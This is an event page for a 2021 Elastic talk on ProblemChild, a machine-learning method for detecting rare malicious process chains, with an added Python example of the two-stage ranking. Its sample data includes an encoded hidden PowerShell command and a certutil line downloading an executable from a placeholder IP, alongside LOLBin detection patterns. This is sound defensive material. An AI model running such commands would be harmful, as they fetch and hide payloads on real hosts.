ProblemChild in the Stack

United States and Canada Virtual

Mar 18, 2021, 7:00 – 8:00 PM

69 RSVPs

Learn how to apply machine learning to security data in the Elastic Stack with ProblemChild, a framework which flags rare malicious processes to help security/malware analysts prioritize events for analysis.

About this event

When it comes to malware attacks, one of the more common techniques is "living off the land": attackers execute their payloads through programs and processes that are already standard on the host, blending into the existing environment to avoid detection. ProblemChild aims to detect these attacks by identifying rare parent-child process chains and suppressing the commonly occurring ones, since a process that is rarely spawned in an environment (and even more so one rarely spawned by a specific parent process) can indicate malicious activity.

The ProblemChild framework identifies these anomalous chains by combining multiple machine learning capabilities in the Elastic Stack to produce an anomaly score for each process event chain. We derive the anomaly score from two components: maliciousness and prevalence. First, we use the Stack's Data Frame Analytics module to train a supervised model on process event data that classifies each event as malicious or benign. The events the supervised model marks malicious are then fed into the Stack's Anomaly Detection module, which determines the "rarest malicious processes" in the environment. Flagging rare malicious processes helps security and malware analysts prioritize events for analysis.
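The two-stage pipeline described above, as an added worked example; this is not ProblemChild's code or Elastic's. Stage 1 stands in for the Data Frame Analytics classifier with a transparent hand-written heuristic (the LOLBin list, Office-parent list, regex features and weights are all hypothetical), and stage 2 stands in for the Anomaly Detection rare function with a simple count of each parent->child chain among the flagged events. The process events are constructed for the example: a fleet-wide admin PowerShell script that looks suspicious on its own, one Office-spawned encoded PowerShell, and one certutil download cradle.

```python
"""Two-stage process-chain triage in the shape ProblemChild describes.

Stage 1: score each process event for maliciousness (a supervised classifier
in ProblemChild; a transparent heuristic here).
Stage 2: among the events stage 1 flags, weight each by how rare its
parent->child chain is, so common admin activity sinks and one-off chains
float to the top of the analyst's queue.
"""
from collections import Counter
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcessEvent:
    host: str    # host.name
    parent: str  # process.parent.name
    child: str   # process.name
    args: str    # process.command_line


# Constructed sample telemetry for this example; not real endpoint data.
EVENTS = [
    ProcessEvent("ws01", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcessEvent("ws02", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcessEvent("ws03", "explorer.exe", "outlook.exe", "outlook.exe"),
    ProcessEvent("ws01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("ws02", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    # Fleet-wide admin script: looks suspicious in isolation, but runs everywhere.
    ProcessEvent("ws01", "cmd.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -w hidden -File C:\\ops\\inventory.ps1"),
    ProcessEvent("ws02", "cmd.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -w hidden -File C:\\ops\\inventory.ps1"),
    ProcessEvent("ws03", "cmd.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -w hidden -File C:\\ops\\inventory.ps1"),
    # One Office-spawned, hidden, encoded PowerShell on a single host.
    ProcessEvent("ws02", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwA="),
    # One certutil download cradle (203.0.113.0/24 is documentation address space).
    ProcessEvent("ws03", "cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe"),
]

# Stage 1 stand-in. ProblemChild trains a supervised model with Data Frame
# Analytics on command-line features; these lists, patterns and weights are
# hypothetical and exist only so the pipeline runs offline.
LOLBINS = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_ARGS = [
    (re.compile(r"-enc(odedcommand)?\b", re.I), 0.5),
    (re.compile(r"-urlcache|downloadstring|invoke-webrequest", re.I), 0.5),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 0.2),
    (re.compile(r"-executionpolicy\s+bypass", re.I), 0.2),
    (re.compile(r"https?://", re.I), 0.2),
    (re.compile(r"-nop\b|-noprofile\b", re.I), 0.1),
]


def maliciousness(event: ProcessEvent) -> float:
    """Probability-like score in [0, 1]; the real system would use model output."""
    score = 0.0
    if event.child.lower() in LOLBINS:
        score += 0.2
    if event.parent.lower() in OFFICE_PARENTS:
        score += 0.3
    for pattern, weight in SUSPICIOUS_ARGS:
        if pattern.search(event.args):
            score += weight
    return min(score, 1.0)


@dataclass(frozen=True)
class ScoredEvent:
    score: float          # maliciousness * rarity; analysts work top-down
    maliciousness: float  # stage 1 output
    chain_count: int      # flagged events sharing this parent->child chain
    event: ProcessEvent


def rank_events(events, threshold=0.5):
    """Run both stages and return flagged events, rarest-and-most-malicious first."""
    # Stage 1: keep only events the classifier calls malicious.
    flagged = [(ev, maliciousness(ev)) for ev in events]
    flagged = [(ev, p) for ev, p in flagged if p >= threshold]

    # Stage 2: prevalence of each parent->child chain among flagged events.
    # This stands in for the Anomaly Detection "rare" function: a chain the
    # classifier flags on many hosts is suppressed (1/count shrinks), while a
    # chain flagged once keeps its full maliciousness score.
    counts = Counter((ev.parent.lower(), ev.child.lower()) for ev, _ in flagged)
    scored = []
    for ev, p in flagged:
        n = counts[(ev.parent.lower(), ev.child.lower())]
        scored.append(ScoredEvent(score=p / n, maliciousness=p, chain_count=n, event=ev))
    return sorted(scored, key=lambda s: s.score, reverse=True)


if __name__ == "__main__":
    for s in rank_events(EVENTS):
        print(f"{s.score:.2f}  mal={s.maliciousness:.2f}  seen={s.chain_count}x  "
              f"{s.event.host}: {s.event.parent} -> {s.event.args}")
```

Run stand-alone, the ranking puts the single winword.exe -> powershell.exe chain first and the certutil cradle second, while the three admin PowerShell events, which stage 1 flags on every host, are pushed to the bottom because their chain is common. The point a practitioner should take from this is that the prevalence stage does not make the classifier more accurate; it reorders the classifier's positives so that the ones an analyst has not seen before are read first.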

Please view the slide deck here: https://ela.st/problemchild-slidedeck

When

Thursday, March 18, 2021
7:00 PM – 8:00 PM UTC

Speakers

  • Apoorva Joshi

    Elastic

    Senior Security Data Scientist - Security Protections Team

  • Disha Dasgupta

    Elastic

    Security Data Scientist

  • Craig Chamberlain

    Elastic

    Area Lead, Detection Science

Organizer

  • Olivia Petrie

    Organizer